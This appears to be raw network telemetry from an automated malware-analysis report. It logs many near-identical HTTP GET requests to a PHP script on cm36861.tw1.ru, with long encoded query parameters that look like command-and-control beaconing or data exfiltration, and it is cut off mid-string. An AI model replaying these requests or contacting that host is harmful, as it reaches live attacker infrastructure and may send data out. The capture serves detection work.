Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2M